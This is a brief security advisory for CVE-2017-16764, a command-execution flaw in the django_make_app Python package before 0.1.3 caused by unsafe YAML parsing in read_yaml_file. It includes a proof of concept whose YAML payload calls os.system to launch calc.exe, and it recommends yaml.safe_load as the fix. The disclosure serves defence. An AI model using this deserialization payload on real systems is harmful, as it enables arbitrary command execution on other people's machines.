CVE-2017-16764: Vulnerability in Django_make_app

Python Package:　　django_make_app

Version:　　　　　 Before 0.1.3

Published:　　　　Nov. 10 th. 2017

Reported by: 　　　　　 Joel

CVE-2017-16764 　　　CVE_details

Overview

Django_make_app is Define models and fields using YAML and generate app for Django with views, forms, templates etc. An issue was discovered in the django_make_app package before 0.1.3.Untrusted data passed into the read_yaml_file function can execute arbitrary python commands resulting in command execution.

POC

1
2
3

from django_make_app.io_utils import read_yaml_file
yaml_raw_data = read_yaml_file('joel.yml')
#'joel.yml'：!!python/object/apply:os.system ["calc.exe"]

Remediation

At present, manufacturers have not yet related repair patch. It should use yaml.safe_load to parse yaml file.